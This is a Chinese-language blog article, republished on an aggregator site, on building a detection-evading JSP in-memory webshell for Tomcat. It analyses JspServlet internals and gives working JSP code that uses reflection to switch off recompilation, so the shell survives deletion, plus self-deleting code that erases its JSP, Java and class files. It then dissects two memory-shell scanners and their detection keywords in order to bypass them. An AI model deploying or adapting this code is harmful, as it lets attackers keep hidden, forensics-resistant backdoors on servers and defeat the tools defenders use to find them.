前言

最近在研究webshell免殺的問題，到了內存馬免殺部分發(fā)現(xiàn)傳統(tǒng)的Filter或者Servlet查殺手段比較多，不太容易實現(xiàn)免殺，比如有些工具會將所有注冊的Servlet和Filter拿出來，排查人員仔細一點還是會被查出來的，所以
我們要找一些其他方式實現(xiàn)的內存馬。比如我今天提到的JSP的內存馬（雖然本質上也是一種Servlet類型的馬） 。

【學習資料】

JSP加載流程分析

在Tomcat中jsp和jspx都會交給JspServlet處理，所以要想實現(xiàn)JSP駐留內存，首先得分析JspServlet的處理邏輯。

<servlet><servlet-name>jsp</servlet-name><servlet-class>org.apache.jasper.servlet.JspServlet</servlet-class>...</servlet> ... <servlet-mapping><servlet-name>jsp</servlet-name><url-pattern>*.jsp</url-pattern><url-pattern>*.jspx</url-pattern></servlet-mapping>

下面分析JspServlet#service方法，主要的功能是接收請求的URL，判斷是否預編譯，核心的方法是serviceJspFile。

public void service (HttpServletRequest request, HttpServletResponse response)throws ServletException, IOException {String jspUri = jspFile;jspUri = (String) request.getAttribute(RequestDispatcher.INCLUDE_SERVLET_PATH);if (jspUri != null) {//檢查請求是否是通過其他Servlet轉發(fā)過來的String pathInfo = (String) request.getAttribute(RequestDispatcher.INCLUDE_PATH_INFO);if (pathInfo != null) {jspUri += pathInfo;}} else {//獲取ServletPath和pathInfo作為jspUrijspUri = request.getServletPath();String pathInfo = request.getPathInfo();if (pathInfo != null) {jspUri += pathInfo;}}}try {//是否預編譯boolean precompile = preCompile(request);//核心方法serviceJspFile(request, response, jspUri, precompile);} catch (RuntimeException | IOException | ServletException e) {throw e;} catch (Throwable e) {ExceptionUtils.handleThrowable(e);throw new ServletException(e);}}

preCompile中只有當請求參數(shù)以jsp_precompile開始才會進行預編譯，否則不進行預編譯。

boolean preCompile(HttpServletRequest request) throws ServletException {String queryString = request.getQueryString();if (queryString == null) {return false;}// public static final String PRECOMPILE = System.getProperty("org.apache.jasper.Constants.PRECOMPILE", "jsp_precompile");int start = queryString.indexOf(Constants.PRECOMPILE);if (start < 0) {return false;}queryString =queryString.substring(start + Constants.PRECOMPILE.length());if (queryString.length() == 0) {return true; // ?jsp_precompile}if (queryString.startsWith("&")) {return true; // ?jsp_precompile&foo=bar...}if (!queryString.startsWith("=")) {return false; // part of some other name or value}...}

那么預編譯的作用是什么？當進行預編譯后會怎么樣？答案在JspServletWrapper#service中，當預編譯后，請求便不會調用對應JSP的servlet的service方法進行處理，所以要想讓我們的JSP能正常使用，當然是不要預編譯的，默認情況下也不會預編譯。

public void service(HttpServletRequest request,HttpServletResponse response,boolean precompile)throws ServletException, IOException, FileNotFoundException {Servlet servlet;...// If a page is to be precompiled only, return.if (precompile) {return;.../** (4) Service request*/if (servlet instanceof SingleThreadModel) {// sync on the wrapper so that the freshness// of the page is determined right before servicingsynchronized (this) {``.service(request, response);}} else {servlet.service(request, response);}...

下面再來看serviceJspFile方法，該方法判斷JSP是否已經(jīng)被注冊為一個Servlet，不存在則創(chuàng)建JspServletWrapper并put到JspRuntimeContext中，JspServletWrapper.service是核心方法。

private void serviceJspFile(HttpServletRequest request,HttpServletResponse response, String jspUri,boolean precompile)throws ServletException, IOException { // 首先判斷JSP是否已經(jīng)被注冊為一個Servlet，ServletWrapper是Servlet的包裝類，所有注冊的JSP servlet都會被保存在JspRuntimeContext的jsps屬性中，如果我們第一次請求這個JSP，當然是找不到wrapper的。JspServletWrapper wrapper = rctxt.getWrapper(jspUri);if (wrapper == null) {synchronized(this) {wrapper = rctxt.getWrapper(jspUri);if (wrapper == null) {//檢查JSP文件是否存在if (null == context.getResource(jspUri)) {handleMissingResource(request, response, jspUri);return;}//創(chuàng)建JspServletWrapperwrapper = new JspServletWrapper(config, options, jspUri,rctxt);//添加wrapper到JspRuntimeContext的jsps屬性中rctxt.addWrapper(jspUri,wrapper);}}}try {//核心方法wrapper.service(request, response, precompile);} catch (FileNotFoundException fnfe) {handleMissingResource(request, response, jspUri);}}

JspServletWrapper.service主要做了如下操作。

• 根據(jù)jsp生成java文件并編譯為class
• 將class文件注冊為servlet
• 調用servlet.service方法完成調用

JSP生成java和class文件主要由下面的代碼完成，這里的options.getDevelopment()代表的是部署模式。

tomcat的開發(fā)模式和生產模式的設定是通過conf文件夾下面的web.xml文件來配置的。

在開發(fā)模式下，容器會經(jīng)常檢查jsp文件的時間戳來決定是否進行編譯，如果jsp文件的時間戳比對應的.class文件的時間戳晚就證明jsp又進行了修改，需要再次編譯，但是不斷地進行時間戳的比對開銷很大，會影響系統(tǒng)性能，而在生產模式下系統(tǒng)不會經(jīng)常想的檢查時間戳。所以一般在開發(fā)過程中使用開發(fā)模式，這樣可以在jsp修改后再次訪問就可以見到修改后的效果非常方便，而系統(tǒng)上線之后就要改為生產模式，雖然生產模式下會導致jsp的修改需要重啟服務器才可以生效，但是上線后的改動較少而且性能很重要。

默認Tomcat是以開發(fā)模式運行的。一般我們遇到的Tomcat都是以開發(fā)模式運行的，所以會由JspCompilationContext#compile進行編譯。

if (options.getDevelopment() || mustCompile) {synchronized (this) {if (options.getDevelopment() || mustCompile) {ctxt.compile();mustCompile = false;}}} else {if (compileException != null) {// Throw cached compilation exceptionthrow compileException;}}

下面我們看下編譯部分都做了什么，Tomcat默認使用JDTCompiler編譯，首先通過isOutDated判斷是否需要編譯，再去檢查JSP文件是否存在，刪除原有的java和Class文件，通過jspCompiler.compile()編譯。【網(wǎng)絡安全學習資料·攻略】

public void compile() throws JasperException, FileNotFoundException {//獲取編譯器，默認使用JDTCompiler編譯createCompiler();//通過isOutDated決定是否編譯if (jspCompiler.isOutDated()) {if (isRemoved()) {throw new FileNotFoundException(jspUri);}try {//刪除已經(jīng)生成的java和Class文件jspCompiler.removeGeneratedFiles();jspLoader = null;//編譯jspCompiler.compile();jsw.setReload(true);jsw.setCompilationException(null);...}

下面我們分析如何將生成的class文件注冊為Servlet。首先判斷theServlet是否為空，如果為空則表示還沒有為JSP文件創(chuàng)建過Servlet，則通過InstanceManager.newInstance創(chuàng)建Servlet,并將創(chuàng)建的Servlet保存在theServlet屬性中。

public Servlet getServlet() throws ServletException { // getReloadInternal是否Reload默認為False，也就是說如果theServlet為true就會直接返回。if (getReloadInternal() || theServlet == null) {synchronized (this) {if (getReloadInternal() || theServlet == null) {//如果theServlet中有值則銷毀該Servlet.destroy();final Servlet servlet;try {//創(chuàng)建Servlet實例InstanceManager instanceManager = InstanceManagerFactory.getInstanceManager(config);servlet = (Servlet) instanceManager.newInstance(ctxt.getFQCN(), ctxt.getJspLoader());} catch (Exception e) {Throwable t = ExceptionUtils.unwrapInvocationTargetException(e);ExceptionUtils.handleThrowable(t);throw new JasperException(t);}//初始化servletservlet.init(config);if (theServlet != null) {ctxt.getRuntimeContext().incrementJspReloadCount();}//將servlet保存到theServlet中，theServlet由volatile修飾，在線程之間可以共享。theServlet = servlet;reload = false;}}}return theServlet;}

下面有一個小知識點，theServlet是由volatile修飾的，在不同的線程之間可以共享，再通過synchronized (this)加鎖，也就是說無論我們請求多少次，無論是哪個線程處理，只要this是一個值，那么theServlet屬性的值是一樣的，而this就是當前的jspServletWrapper，我們訪問不同的JSP也是由不同的jspServletWrapper處理的。

最后就是調用servlet.service方法完成請求處理。

內存駐留分析

上面我們已經(jīng)分析完了JSP的處理邏輯，要想要完成內存駐留，我們要解決下面的問題。

• 請求后不去檢查JSP文件是否存在
• theServlet中一直保存著我們的servlet，當我們請求對應url還能交給我們的servlet處理

第二個問題比較容易，theServlet能否獲取到Servlet或者獲取到哪個Servlet和jspServletWrapper是有關的，而在JspServlet#serviceJspFile中，如果我們已經(jīng)將Servlet注冊過，可以根據(jù)url從JspRuntimeContext中獲取得到對應的jspServletWrapper。

private void serviceJspFile(HttpServletRequest request,HttpServletResponse response, String jspUri,boolean precompile)throws ServletException, IOException {JspServletWrapper wrapper = rctxt.getWrapper(jspUri);if (wrapper == null) {...}try {wrapper.service(request, response, precompile);} catch (FileNotFoundException fnfe) {handleMissingResource(request, response, jspUri);}}

繞過方法一

下面解決請求后不去檢查JSP文件是否存在問題，首先我想繞過下面的判斷,如果我們能讓options.getDevelopment()返回false就不會進入complie部分。

if (options.getDevelopment() || mustCompile) {synchronized (this) {if (options.getDevelopment() || mustCompile) {// The following sets reload to true, if necessaryctxt.compile();mustCompile = false;}}}

development并不是一個static屬性，所以不能直接修改，要拿到options的對象。

private boolean development = true;

options對象被存儲在JspServlet中，

public class JspServlet extends HttpServlet implements PeriodicEventListener { ...private transient Options options;

MappingData中保存了路由匹配的結果,MappingData的wrapper字段包含處理請求的wrapper，在Tomcat中，Wrapper代表一個Servlet，它負責管理一個 Servlet，包括的 Servlet的裝載、初始化、執(zhí)行以及資源回收。在Wrapper的instance屬性中保存著servlet的實例，因此我們可以從MappingData中拿到JspServlet進而更改options的development屬性值。【網(wǎng)絡安全學習資料·攻略】

public class MappingData {public Host host = null;public Context context = null;public int contextSlashCount = 0;public Context[] contexts = null;public Wrapper wrapper = null;public boolean jspWildCard = false; }

所以我們可以通過反射對development的屬性修改，下面代碼參考Tomcat容器攻防筆記之JSP金蟬脫殼

<%//從request對象中獲取request屬性Field requestF = request.getClass().getDeclaredField("request");requestF.setAccessible(true);Request req = (Request) requestF.get(request);//獲取MappingDataMappingData mappingData = req.getMappingData();//獲取WrapperField wrapperF = mappingData.getClass().getDeclaredField("wrapper");wrapperF.setAccessible(true);Wrapper wrapper = (Wrapper) wrapperF.get(mappingData);//獲取jspServlet對象Field instanceF = wrapper.getClass().getDeclaredField("instance");instanceF.setAccessible(true);Servlet jspServlet = (Servlet) instanceF.get(wrapper);//獲取options中保存的對象 Field Option = jspServlet.getClass().getDeclaredField("options");Option.setAccessible(true);EmbeddedServletOptions op = (EmbeddedServletOptions) Option.get(jspServlet);//設置development屬性為falseField Developent = op.getClass().getDeclaredField("development");Developent.setAccessible(true);Developent.set(op,false); %>

既然已經(jīng)分析好了，我們做一個測試， 當我們第二次請求我們的腳本development
的屬性值已經(jīng)被改為false,即使我們刪除對應的jsp\java\Class文件，仍然還可以還可以正常請求shell。

那么經(jīng)過修改后會不會導致后來上傳的jsp文件都無法執(zhí)行的問題呢？

不會，因為每一個JSP文件，只有已經(jīng)編譯并且注冊為Servlet后，mustCompile屬性才會為False，默認為True，并且mustCompile也是由volatile修飾并且在synchronized加鎖的代碼塊中，只有同一個jspServletWrapper的mustCompile的修改在下次請求時還有效。當然也不是說完全沒有影響，
如果我們想修改一個已經(jīng)加載為Servlet 的JSP文件，即使修改了也不會生效。

if (options.getDevelopment() || mustCompile) {synchronized (this) {if (options.getDevelopment() || mustCompile) {ctxt.compile();mustCompile = false;}}

繞過方法二

下一個我們有機會繞過的點在compile中，如果我們能讓isOutDated返回false，也可以達到繞過的目的。

public void compile() throws JasperException, FileNotFoundException {createCompiler();if (jspCompiler.isOutDated()) {...}}

注意看下面的代碼,在isOutDated中，當滿足下面的條件則會返回false。jsw中保存的是jspServletWarpper對象，所以是不為null的，并且modificationTestInterval默認值是4也滿足條件，所以我們現(xiàn)在要做的就是讓modificationTestInterval*1000大于System.currentTimeMillis(),所以
只要將modificationTestInterval 修改為一個比較大的值也可以達到繞過的目的。

public boolean isOutDated(boolean checkClass) {if (jsw != null&& (ctxt.getOptions().getModificationTestInterval() > 0)) {if (jsw.getLastModificationTest()+ (ctxt.getOptions().getModificationTestInterval() * 1000) > System.currentTimeMillis()) {return false;}}

modificationTestInterval也保存在options屬性中，所以修改的方法和方法一類似，就不羅列代碼了。

public final class EmbeddedServletOptions implements Options { ...private int modificationTestInterval = 4;... }

查殺情況分析

tomcat-memshell-scanner

這款工具會Dump出所有保存在servletMappings中的Servlet的信息，不過我們的JSPServlet并沒有保存在servletMappings中，而是在JspRuntimeContext#jsps字段中，因此根本查不到。

copagent

JSP本質上也就是Servlet，編譯好的Class繼承了HttpJspBase，類圖如下所示。【網(wǎng)絡安全學習資料·攻略】

copagent流程分析

copagent首先獲取所有已經(jīng)加載的類，并創(chuàng)建了幾個數(shù)組。

• riskSuperClassesName中保存了HttpServlet，用于獲取Servlet，因為我們注冊的Servlet會直接或者間接繼承HttpServlet
• riskPackage保存了一些惡意的包名，比如冰蝎的包名為net.rebeyond，使用冰蝎連接webshell時會將自己的惡意類加載到內存，而這個惡意類也是以net.rebeyond為包名的
• riskAnnotations保存了SpringMVC中注解注冊Controller的類型，顯然是為了抓出所有SpringMVC中通過注解注冊的Controller

private static synchronized void catchThief(String name, Instrumentation ins){...List<Class<?>> resultClasses = new ArrayList<Class<?>>();// 獲得所有已加載的類及類名Class<?>[] loadedClasses = ins.getAllLoadedClasses();LogUtils.logit("Found All Loaded Classes : " + loadedClasses.length);List<String> loadedClassesNames = new ArrayList<String>();for(Class<?> cls: loadedClasses){loadedClassesNames.add(cls.getName());}...// 實現(xiàn)的可能具有 web shell 功能的父類名List<String> riskSuperClassesName = new ArrayList<String>();riskSuperClassesName.add("javax.servlet.http.HttpServlet");// 黑名單攔截List<String> riskPackage = new ArrayList<String>();riskPackage.add("net.rebeyond.");riskPackage.add("com.metasploit.");// 風險注解List<String> riskAnnotations = new ArrayList<String>();riskAnnotations.add("org.springframework.stereotype.Controller");riskAnnotations.add("org.springframework.web.bind.annotation.RestController"); riskAnnotations.add("org.springframework.web.bind.annotation.RequestMapping");riskAnnotations.add("org.springframework.web.bind.annotation.GetMapping");riskAnnotations.add("org.springframework.web.bind.annotation.PostMapping");riskAnnotations.add("org.springframework.web.bind.annotation.PatchMapping");riskAnnotations.add("org.springframework.web.bind.annotation.PutMapping");riskAnnotations.add("org.springframework.web.bind.annotation.Mapping");...

下面代碼完成主要的檢測邏輯，首先會檢測包名和SpringMVC注解的類，檢測到則添加到resultClasses中，并且修改not_found標志位為False，表示不檢測Servelt/Filter/Listener類型的shell。

for(Class<?> clazz: loadedClasses){Class<?> target = clazz;boolean not_found = true;//檢測包名是否為惡意包名，如果是則設置not_found為false，代表已經(jīng)被shell連接過了，跳過后面Servlet和Filter內存馬部分的檢測并Dump出惡意類的信息。for(String packageName: riskPackage){if(clazz.getName().startsWith(packageName)){resultClasses.add(clazz);not_found = false;ClassUtils.dumpClass(ins, clazz.getName(), false, Integer.toHexString(target.getClassLoader().hashCode()));break;}}//判斷是否使用SpringMVC的注解注冊Controller，如果是則Dump出使用注解的Controller的類的信息if(ClassUtils.isUseAnnotations(clazz, riskAnnotations)){resultClasses.add(clazz);not_found = false;ClassUtils.dumpClass(ins, clazz.getName(), false, Integer.toHexString(target.getClassLoader().hashCode()));}//檢測Servelt/Filter/Listener類型Webshellif(not_found){// 遞歸查找while (target != null && !target.getName().equals("java.lang.Object")){// 每次都重新獲得目標類實現(xiàn)的所有接口interfaces = new ArrayList<String>();for(Class<?> cls: target.getInterfaces()){interfaces.add(cls.getName());}if( // 繼承危險父類的目標類(target.getSuperclass() != null && riskSuperClassesName.contains(target.getSuperclass().getName())) ||// 實現(xiàn)特殊接口的目標類target.getName().equals("org.springframework.web.servlet.handler.AbstractHandlerMapping") ||interfaces.contains("javax.servlet.Filter") ||interfaces.contains("javax.servlet.Servlet") ||interfaces.contains("javax.servlet.ServletRequestListener")){...if(loadedClassesNames.contains(clazz.getName())){resultClasses.add(clazz);ClassUtils.dumpClass(ins, clazz.getName(), false, Integer.toHexString(clazz.getClassLoader().hashCode()));}else{...}break;}target = target.getSuperclass();}}

我們主要關注Servlet的檢測，首先獲取當前Class的實現(xiàn)接口，如果Class的父類不為空并且父類不是HttpServlet，并且沒有實現(xiàn)Serlvet\Filter\ServletRequestListener等接口則不會被添加到resultClasses但會遞歸的去檢查父類。由于JSP文件實際繼承了HttpJspBase，相當于間接繼承了HttpServlet，所以是繞不過這里的檢查的，不過沒關系，這一步只是檢查是否是Servlet，并不代表被檢測出來了。

while (target != null && !target.getName().equals("java.lang.Object")){// 每次都重新獲得目標類實現(xiàn)的所有接口interfaces = new ArrayList<String>();for(Class<?> cls: target.getInterfaces()){interfaces.add(cls.getName());}if( // 繼承危險父類的目標類(target.getSuperclass() != null && riskSuperClassesName.contains(target.getSuperclass().getName())) ||// 實現(xiàn)特殊接口的目標類target.getName().equals("org.springframework.web.servlet.handler.AbstractHandlerMapping") ||interfaces.contains("javax.servlet.Filter") ||interfaces.contains("javax.servlet.Servlet") ||interfaces.contains("javax.servlet.ServletRequestListener")){if(loadedClassesNames.contains(clazz.getName())){resultClasses.add(clazz);ClassUtils.dumpClass(ins, clazz.getName(), false, Integer.toHexString(clazz.getClassLoader().hashCode()));}else{LogUtils.logit("cannot find " + clazz.getName() + " classes in instrumentation");}break;...}target = target.getSuperclass();}

下面是判斷是否為惡意內容的核心，只有當resultClasses中包含了關鍵下面的關鍵字才會被標記為high，這里如果我們使用自定義馬的話也是可以繞過的，但是如果要使用冰蝎,一定會被javax.crypto.加密包的規(guī)則檢測到，如果是自定義加密算法也是可以繞過的。

List<String> riskKeyword = new ArrayList<String>();riskKeyword.add("javax.crypto.");riskKeyword.add("ProcessBuilder");riskKeyword.add("getRuntime");riskKeyword.add("shell"); ...for(Class<?> clazz: resultClasses){File dumpPath = PathUtils.getStorePath(clazz, false);String level = "normal";String content = PathUtils.getFileContent(dumpPath);for(String keyword: riskKeyword){if(content.contains(keyword)){level = "high";break;}}

自刪除

上面只是分析了如何讓我們的JSP在刪除了JSP\java\Class文件后還能訪問，下面我們分析如何在JSP中實現(xiàn)刪除JSP\java\Class文件，在JspCompilationContext保存著JSP編譯的上下文信息，我們可以從中拿到java/class的絕對路徑。【網(wǎng)絡安全學習資料·攻略】

public JspServletWrapper(ServletConfig config, Options options,String jspUri, JspRuntimeContext rctxt) {...ctxt = new JspCompilationContext(jspUri, options,config.getServletContext(),this, rctxt);}

request.request.getMappingData().wrapper.instance.rctxt.jsps.get("/jsp.jsp")

下面是代碼實現(xiàn)

<%//從request對象中獲取request屬性Field requestF = request.getClass().getDeclaredField("request");requestF.setAccessible(true);Request req = (Request) requestF.get(request);//獲取MappingDataMappingData mappingData = req.getMappingData();//獲取Wrapper，這里的Wrapper是StandrardWrapperField wrapperF = mappingData.getClass().getDeclaredField("wrapper");wrapperF.setAccessible(true);Wrapper wrapper = (Wrapper) wrapperF.get(mappingData);//獲取jspServlet對象Field instanceF = wrapper.getClass().getDeclaredField("instance");instanceF.setAccessible(true);Servlet jspServlet = (Servlet) instanceF.get(wrapper);//獲取rctxt屬性Field rctxt = jspServlet.getClass().getDeclaredField("rctxt");rctxt.setAccessible(true);JspRuntimeContext jspRuntimeContext = (JspRuntimeContext) rctxt.get(jspServlet);//獲取jsps屬性內容Field jspsF = jspRuntimeContext.getClass().getDeclaredField("jsps");jspsF.setAccessible(true);ConcurrentHashMap jsps = (ConcurrentHashMap) jspsF.get(jspRuntimeContext);//獲取對應的JspServletWrapperJspServletWrapper jsw = (JspServletWrapper)jsps.get(request.getServletPath());//獲取ctxt屬性保存的JspCompilationContext對象Field ctxt = jsw.getClass().getDeclaredField("ctxt");ctxt.setAccessible(true);JspCompilationContext jspCompContext = (JspCompilationContext) ctxt.get(jsw);File targetFile;targetFile = new File(jspCompContext.getClassFileName());//刪掉jsp的.classtargetFile.delete();targetFile = new File(jspCompContext.getServletJavaFileName());//刪掉jsp的java文件targetFile.delete();//刪除JSP文件String __jspName = this.getClass().getSimpleName().replaceAll("_", ".");String path=application.getRealPath(__jspName);File file = new File(path);file.delete(); %>

最后有個不兼容的小BUG，tomcat7和8/9的MappingData類包名發(fā)生了變化

tomcat7:<%@ page import="org.apache.tomcat.util.http.mapper.MappingData" %> tomcat8/9:<%@ page import="org.apache.catalina.mapper.MappingData" %>

參考文獻

總結

雖然不能使用冰蝎等webshell繞過這兩款工具的檢測，但是當我們了解了查殺原理，將自己的webshell稍微改一下，也是可以繞過的

最后

關注我持續(xù)更新優(yōu)質文章，私我獲取【網(wǎng)絡安全學習資料·攻略】

總結

以上是生活随笔為你收集整理的【Web安全】JSP内存马研究的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內容還不錯，歡迎將生活随笔推薦給好友。